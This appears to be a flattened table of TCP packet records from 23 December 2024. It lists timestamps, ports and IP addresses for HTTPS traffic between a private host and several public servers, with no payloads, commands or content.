                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.842909098 CET49979443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:33.842940092 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.073714972 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.073781013 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.074150085 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.074153900 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.075975895 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.075980902 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076049089 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076061010 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076343060 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076363087 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076483011 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076742887 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076811075 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.076818943 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077167034 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077178955 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077269077 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077281952 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077373981 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077380896 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077399015 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077420950 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077442884 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077451944 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077462912 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077469110 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077709913 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077718019 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077733994 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077748060 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077764988 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077778101 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077812910 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077821016 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077836990 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077851057 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077857018 CET49973443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:34.077861071 CET4434997394.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.051987886 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.052192926 CET49979443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.052247047 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.052612066 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.052911997 CET49979443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.052989006 CET4434997923.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.055509090 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.055903912 CET49980443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.055913925 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.056200027 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.056508064 CET49980443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.056557894 CET4434998023.209.72.32192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.107079983 CET49980443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.107093096 CET49979443192.168.2.523.209.72.32
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.206724882 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.206785917 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.207755089 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.207758904 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209280014 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209284067 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209400892 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209423065 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209522963 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209542036 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209645987 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209671974 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209742069 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209754944 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209795952 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209806919 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209841967 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209853888 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209883928 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209891081 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209932089 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209943056 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209985971 CET49978443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:35.209997892 CET4434997894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:37.780978918 CET49994443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.140644073 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.140691996 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.140836954 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.141690016 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.141711950 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.164781094 CET4434999420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.165102005 CET4434999420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.165287018 CET49994443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.165349007 CET49994443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.165368080 CET4434999420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.165378094 CET49994443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.165427923 CET49994443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.404375076 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.405658960 CET50002443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.405682087 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.406200886 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.406608105 CET50002443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.406728029 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.406800985 CET50002443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.451330900 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.452069044 CET50002443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.534077883 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.534156084 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.534495115 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.534517050 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536290884 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536304951 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536385059 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536405087 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536545992 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536581039 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536847115 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.536883116 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.537189007 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.537214041 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.537235022 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.537247896 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.537291050 CET50004443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.537307978 CET4435000494.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.657870054 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.658096075 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.658137083 CET50011443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.658147097 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.658384085 CET50010443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.658405066 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.659634113 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.659719944 CET50011443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.659857988 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.659915924 CET50010443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.660706043 CET50011443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.660803080 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.660804987 CET50010443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.660881996 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.702460051 CET50011443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.702460051 CET50010443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.702466965 CET4435001123.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.702477932 CET4435001023.219.82.75192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.750010967 CET50010443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.750212908 CET50011443192.168.2.523.219.82.75
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.851469040 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.851622105 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.851778030 CET50002443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.886955023 CET50002443192.168.2.5108.139.47.92
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.886980057 CET44350002108.139.47.92192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.945010900 CET4435000920.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.945228100 CET50009443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.945252895 CET4435000920.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.945588112 CET4435000920.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.946023941 CET50009443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.946078062 CET4435000920.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.946240902 CET50009443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.987337112 CET4435000920.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.989027023 CET44350013204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.989469051 CET50013443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.989506960 CET44350013204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.990469933 CET44350013204.79.197.219192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:38.990535021 CET50013443192.168.2.5204.79.197.219
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647186995 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647212982 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647279024 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647310019 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647334099 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647361994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647387028 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647397041 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647416115 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647424936 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.647450924 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.687326908 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.690936089 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.690973043 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.690992117 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691014051 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691031933 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691076994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691099882 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691117048 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.691272020 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.735327005 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738351107 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738385916 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738414049 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738437891 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738486052 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738508940 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738796949 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738850117 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.738908052 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.783339024 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800194979 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800276995 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800331116 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800403118 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800452948 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.800466061 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807380915 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807466984 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807703972 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807816982 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807837963 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.807874918 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.818759918 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819159031 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819246054 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819267988 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819310904 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819370031 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819391966 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819410086 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.819464922 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.859340906 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862338066 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862510920 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862526894 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862544060 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862607956 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862632036 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862638950 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862657070 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862703085 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862732887 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.862771988 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.903332949 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.918565035 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928095102 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928168058 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928423882 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928452015 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928466082 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928529024 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928632975 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.928672075 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.932010889 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.932074070 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:39.975334883 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297485113 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297523022 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297585964 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297596931 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297615051 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297646999 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297687054 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297709942 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297724009 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297755957 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297776937 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.297817945 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298022985 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298146009 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298180103 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298265934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298290968 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298341990 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298435926 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298455000 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298553944 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.298572063 CET4435001594.130.188.57192.168.2.5
